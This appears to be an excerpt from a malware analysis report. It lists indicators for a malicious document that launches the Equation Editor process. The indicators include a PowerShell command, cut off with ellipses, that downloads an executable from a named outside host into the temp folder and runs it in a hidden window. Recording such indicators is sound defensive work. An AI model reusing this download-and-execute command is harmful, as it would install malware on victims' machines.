Technical Information
- https://datiamachine.com/order/ht.exe as $sliwpw
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$sLIwPW=$env:temp+'\Name.exe'; (New-Object System.Net.WebClient).DownloadFile( 'https://datiamachine.com/order/ht.exe', $sLIwPW);(New-Object -com Shell.Application).ShellExec...
- DNS ASK da####achine.com
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$sLIwPW=$env:temp+'\Name.exe'; (New-Object System.Net.WebClient).DownloadFile( 'https://datiamachine.com/order/ht.exe', $sLIwPW);(New-Object -com Shell.Application).ShellExec...' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding